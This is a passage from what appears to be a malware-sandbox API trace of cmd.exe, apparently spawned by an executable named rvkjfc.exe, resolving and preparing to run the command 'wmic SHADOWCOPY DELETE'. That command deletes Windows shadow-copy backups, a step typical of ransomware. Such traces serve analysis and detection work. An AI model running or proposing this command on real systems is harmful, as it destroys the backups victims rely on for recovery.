lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x0, lpData=0x26ed40*=0x40, lpcbData=0x26ed24*=0x1000) returned 0x2 [0043.834] RegCloseKey (hKey=0x44) returned 0x0 [0043.834] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed28 | out: phkResult=0x26ed28*=0x44) returned 0x0 [0043.834] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x0, lpData=0x26ed40*=0x40, lpcbData=0x26ed24*=0x1000) returned 0x2 [0043.834] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x4, lpData=0x26ed40*=0x1, lpcbData=0x26ed24*=0x4) returned 0x0 [0043.834] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x0, lpData=0x26ed40*=0x1, lpcbData=0x26ed24*=0x1000) returned 0x2 [0043.834] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x4, lpData=0x26ed40*=0x0, lpcbData=0x26ed24*=0x4) returned 0x0 [0043.834] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x4, lpData=0x26ed40*=0x9, lpcbData=0x26ed24*=0x4) returned 0x0 [0043.834] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x4, lpData=0x26ed40*=0x9, lpcbData=0x26ed24*=0x4) returned 0x0 [0043.834] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed20, lpData=0x26ed40, lpcbData=0x26ed24*=0x1000 | out: lpType=0x26ed20*=0x0, lpData=0x26ed40*=0x9, lpcbData=0x26ed24*=0x1000) returned 0x2 [0043.834] RegCloseKey (hKey=0x44) returned 0x0 [0043.834] time (in: timer=0x0 | out: timer=0x0) returned 0x5e5fdfec [0043.834] srand (_Seed=0x5e5fdfec) [0043.834] GetCommandLineW () returned="/C wmic SHADOWCOPY DELETE" [0043.834] GetCommandLineW () returned="/C wmic SHADOWCOPY DELETE" [0043.834] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0043.834] GetProcessHeap () returned 0x3c0000 [0043.834] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x218) returned 0x3daa10 [0043.834] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3daa20, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0043.835] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0043.835] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.835] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0043.835] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0043.835] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0043.835] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0043.835] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0043.835] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0043.835] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0043.835] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0043.835] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0043.835] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0043.835] GetProcessHeap () returned 0x3c0000 [0043.835] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d94f0 | out: hHeap=0x3c0000) returned 1 [0043.835] GetEnvironmentStringsW () returned 0x3d8a60* [0043.835] GetProcessHeap () returned 0x3c0000 [0043.835] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa94) returned 0x3dac30 [0043.835] FreeEnvironmentStringsW (penv=0x3d8a60) returned 1 [0043.835] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.835] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0043.835] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0043.835] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0043.835] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0043.835] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0043.835] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0043.835] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0043.835] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0043.835] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0043.835] GetProcessHeap () returned 0x3c0000 [0043.835] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x5c) returned 0x3db6d0 [0043.836] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fb30 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0043.836] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26fb30, lpFilePart=0x26fb10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26fb10*="Desktop") returned 0x25 [0043.836] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0043.836] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f840 | out: lpFindFileData=0x26f840*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3db740 [0043.836] FindClose (in: hFindFile=0x3db740 | out: hFindFile=0x3db740) returned 1 [0043.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f840 | out: lpFindFileData=0x26f840*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3db740 [0043.836] FindClose (in: hFindFile=0x3db740 | out: hFindFile=0x3db740) returned 1 [0043.836] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0043.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f840 | out: lpFindFileData=0x26f840*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x183bc620, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x183bc620, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3db740 [0043.836] FindClose (in: hFindFile=0x3db740 | out: hFindFile=0x3db740) returned 1 [0043.836] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0043.836] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0043.836] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0043.836] GetProcessHeap () returned 0x3c0000 [0043.836] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dac30 | out: hHeap=0x3c0000) returned 1 [0043.836] GetEnvironmentStringsW () returned 0x3db740* [0043.837] GetProcessHeap () returned 0x3c0000 [0043.837] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xae8) returned 0x3dc230 [0043.837] FreeEnvironmentStringsW (penv=0x3db740) returned 1 [0043.837] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0043.837] GetProcessHeap () returned 0x3c0000 [0043.837] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3db6d0 | out: hHeap=0x3c0000) returned 1 [0043.837] GetProcessHeap () returned 0x3c0000 [0043.837] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4016) returned 0x3dcd20 [0043.837] GetProcessHeap () returned 0x3c0000 [0043.837] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x42) returned 0x3d9550 [0043.837] GetProcessHeap () returned 0x3c0000 [0043.837] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dcd20 | out: hHeap=0x3c0000) returned 1 [0043.837] GetConsoleOutputCP () returned 0x1b5 [0043.837] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0043.837] GetUserDefaultLCID () returned 0x409 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49d57b50, cchData=8 | out: lpLCData=":") returned 2 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fc40, cchData=128 | out: lpLCData="0") returned 2 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fc40, cchData=128 | out: lpLCData="0") returned 2 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fc40, cchData=128 | out: lpLCData="1") returned 2 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49d6a740, cchData=8 | out: lpLCData="/") returned 2 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49d6a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49d6a460, cchData=32 | out: lpLCData="Tue") returned 4 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49d6a420, cchData=32 | out: lpLCData="Wed") returned 4 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49d6a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49d6a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49d6a360, cchData=32 | out: lpLCData="Sat") returned 4 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49d6a700, cchData=32 | out: lpLCData="Sun") returned 4 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49d57b40, cchData=8 | out: lpLCData=".") returned 2 [0043.838] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49d6a4e0, cchData=8 | out: lpLCData=",") returned 2 [0043.839] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0043.839] GetProcessHeap () returned 0x3c0000 [0043.839] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20c) returned 0x3d9610 [0043.839] GetConsoleTitleW (in: lpConsoleTitle=0x3d9610, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0043.839] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0043.840] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0043.840] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0043.840] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0043.840] GetProcessHeap () returned 0x3c0000 [0043.840] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4012) returned 0x3dcd20 [0043.840] GetProcessHeap () returned 0x3c0000 [0043.840] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dcd20 | out: hHeap=0x3c0000) returned 1 [0043.840] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0043.840] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0043.840] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0043.840] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0043.840] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0043.840] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0043.840] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0043.841] GetProcessHeap () returned 0x3c0000 [0043.841] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0) returned 0x3d9830 [0043.841] GetProcessHeap () returned 0x3c0000 [0043.841] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1a) returned 0x3d45e0 [0043.841] GetProcessHeap () returned 0x3c0000 [0043.841] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x36) returned 0x3d64d0 [0043.842] GetConsoleTitleW (in: lpConsoleTitle=0x26fb50, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0043.842] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0043.842] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0043.842] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0043.842] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0043.842] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0043.842] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0043.842] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0043.842] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0043.842] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0043.842] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0043.842] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0043.842] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0043.842] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0043.842] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0043.842] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0043.842] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0043.842] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0043.842] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0043.842] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0043.842] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0043.842] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0043.842] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0043.842] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0043.842] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0043.842] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0043.842] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0043.842] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0043.842] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0043.843] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0043.843] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0043.843] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0043.843] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0043.843] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0043.843] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0043.843] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0043.843] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0043.843] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0043.843] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0043.843] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0043.843] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0043.843] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0043.843] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0043.843] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0043.843] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0043.843] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0043.843] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0043.843] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0043.843] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0043.843] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0043.843] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0043.843] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0043.843] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0043.843] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0043.843] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0043.843] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0043.843] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0043.843] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0043.843] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0043.843] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0043.843] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0043.843] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0043.843] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0043.843] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0043.843] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0043.843] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0043.843] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0043.843] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0043.843] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0043.844] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0043.844] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0043.844] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0043.844] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0043.844] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0043.844] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0043.844] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0043.844] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0043.844] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0043.844] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0043.844] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0043.844] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0043.844] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0043.844] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0043.844] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0043.844] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0043.844] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0043.844] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0043.844] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0043.844] GetProcessHeap () returned 0x3c0000 [0043.844] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x218) returned 0x3d98f0 [0043.844] GetProcessHeap () returned 0x3c0000 [0043.844] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x40) returned 0x3dac60 [0043.844] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0043.844] GetProcessHeap () returned 0x3c0000 [0043.844] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x420) returned 0x3d9b10 [0043.845] SetErrorMode (uMode=0x0) returned 0x0 [0043.845] SetErrorMode (uMode=0x1) returned 0x0 [0043.845] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3d9b20, lpFilePart=0x26f3e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f3e0*="Desktop") returned 0x25 [0043.845] SetErrorMode (uMode=0x0) returned 0x1 [0043.845] GetProcessHeap () returned 0x3c0000 [0043.845] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3d9b10, Size=0x66) returned 0x3d9b10 [0043.845] GetProcessHeap () returned 0x3c0000 [0043.845] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3d9b10) returned 0x66 [0043.845] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0043.845] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.845] GetProcessHeap () returned 0x3c0000 [0043.845] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x128) returned 0x3d9b90 [0043.845] GetProcessHeap () returned 0x3c0000 [0043.845] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x240) returned 0x3d9cc0 [0043.851] GetProcessHeap () returned 0x3c0000 [0043.851] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3d9cc0, Size=0x12a) returned 0x3d9cc0 [0043.851] GetProcessHeap () returned 0x3c0000 [0043.851] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3d9cc0) returned 0x12a [0043.851] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.851] GetProcessHeap () returned 0x3c0000 [0043.851] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xe8) returned 0x3d9e00 [0043.851] GetProcessHeap () returned 0x3c0000 [0043.851] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3d9e00, Size=0x7e) returned 0x3d9e00 [0043.851] GetProcessHeap () returned 0x3c0000 [0043.852] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3d9e00) returned 0x7e [0043.853] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.853] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f150) returned 0xffffffffffffffff [0043.853] GetLastError () returned 0x2 [0043.853] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x26f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f150) returned 0xffffffffffffffff [0043.853] GetLastError () returned 0x2 [0043.853] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.853] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f150) returned 0xffffffffffffffff [0043.854] GetLastError () returned 0x2 [0043.854] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x26f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f150) returned 0xffffffffffffffff [0043.854] GetLastError () returned 0x2 [0043.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.854] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f150) returned 0xffffffffffffffff [0043.854] GetLastError () returned 0x2 [0043.854] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x26f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f150) returned 0xffffffffffffffff [0043.854] GetLastError () returned 0x2 [0043.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.854] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f150) returned 0x3d9e90 [0043.854] GetProcessHeap () returned 0x3c0000 [0043.854] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x28) returned 0x3d4610 [0043.854] FindClose (in: hFindFile=0x3d9e90 | out: hFindFile=0x3d9e90) returned 1 [0043.854] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x26f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f150) returned 0xffffffffffffffff [0043.855] GetLastError () returned 0x2 [0043.855] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x26f150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f150) returned 0x3d9e90 [0043.855] GetProcessHeap () returned 0x3c0000 [0043.855] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3d4610, Size=0x8) returned 0x3d8900 [0043.855] FindClose (in: hFindFile=0x3d9e90 | out: hFindFile=0x3d9e90) returned 1 [0043.855] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0043.855] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0043.855] GetConsoleTitleW (in: lpConsoleTitle=0x26f6a0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0043.855] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f458, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f418 | out: lpAttributeList=0x26f458, lpSize=0x26f418) returned 1 [0043.855] 